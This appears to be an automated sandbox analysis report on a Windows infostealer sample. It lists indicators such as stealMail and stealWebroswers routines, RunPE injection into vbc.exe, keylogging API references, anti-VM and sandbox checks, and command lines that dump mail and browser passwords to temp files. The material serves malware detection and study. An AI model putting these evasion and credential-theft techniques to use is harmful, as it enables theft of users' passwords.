Source: 11.0.tDb0ggawON.exe.400000.4.unpack, 11.0.tDb0ggawON.exe.400000.6.unpack, 11.0.tDb0ggawON.exe.400000.11.unpack, 11.0.tDb0ggawON.exe.400000.16.unpack, 11.0.tDb0ggawON.exe.400000.21.unpack and 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs; Base64 encoded strings: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource
Source: tDb0ggawON.exe, 00000000.00000003.287628346.0000000008860000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.287200122.0000000008860000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.287813801.0000000008860000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: in certain jurisdictions.slnt
Source: tDb0ggawON.exe, 00000000.00000003.285160387.0000000008860000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: is a trademark of The Monotype Corporation which may be registered in certain jurisdictions.slnt
Source: tDb0ggawON.exe, 00000000.00000003.285925430.0000000008860000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: egistered in certain jurisdictions.slnt
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (reported three times) and 'CreateDecryptor' alone (reported once)
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (reported three times)
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: tDb0ggawON.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: tDb0ggawON.exeStatic file information: File size 1244160 > 1048576
                  Source: tDb0ggawON.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: tDb0ggawON.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12f000
                  Source: tDb0ggawON.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp

                  Data Obfuscation

Source: C:\Users\user\Desktop\tDb0ggawON.exe | Unpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Unpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 0_2_00FB5AE0 push ebx; ret 0_2_00FB5AEF
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 0_2_00FB49CD push edx; ret 0_2_00FB49D5
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 0_2_00FB671A push edx; retf 0_2_00FB671F
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 0_2_05A4318F push es; iretd 0_2_05A43190
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 0_2_09F19CF5 push FFFFFF8Bh; iretd 0_2_09F19CF7
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 11_2_00BA5AE0 push ebx; ret 11_2_00BA5AEF
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 11_2_00BA49CD push edx; ret 11_2_00BA49D5
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 11_2_00BA671A push edx; retf 11_2_00BA671F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00442871 push ecx; ret 14_2_00442881
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00442A90 push eax; ret 14_2_00442AA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00442A90 push eax; ret 14_2_00442ACC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00446E54 push eax; ret 14_2_00446E61
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 15_2_00411879 push ecx; ret 15_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 15_2_004118A0 push eax; ret 15_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 15_2_004118A0 push eax; ret 15_2_004118DC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004422C7
Source: initial sample | Static PE information: section name: .text entropy: 7.84726885826

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\tDb0ggawON.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_00441975
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: Yara match | File source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5868 | Thread sleep time: -34588s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5032 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5856 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 4736 | Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 2076 | Thread sleep time: -71000s >= -30000s
Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 4696 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 14_2_00408836
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Window / User API: threadDelayed 355
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_004161B0 memset,GetSystemInfo, 14_2_004161B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen, 14_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00407E0E FindFirstFileW,FindNextFileW,FindClose, 14_2_00407E0E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00406EC3
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 34588
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 120000
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 140000
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Thread delayed: delay time: 180000
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: bhvED7C.tmp.14.dr | Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220214T174307Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ee30c48e4bbc4e22b328cbb579b9ae00&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1386668&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1386668&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 14_2_00408836
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004422C7
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\tDb0ggawON.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process created: C:\Users\user\Desktop\tDb0ggawON.exe C:\Users\user\Desktop\tDb0ggawON.exe
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Queries volume information: C:\Users\user\Desktop\tDb0ggawON.exe VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
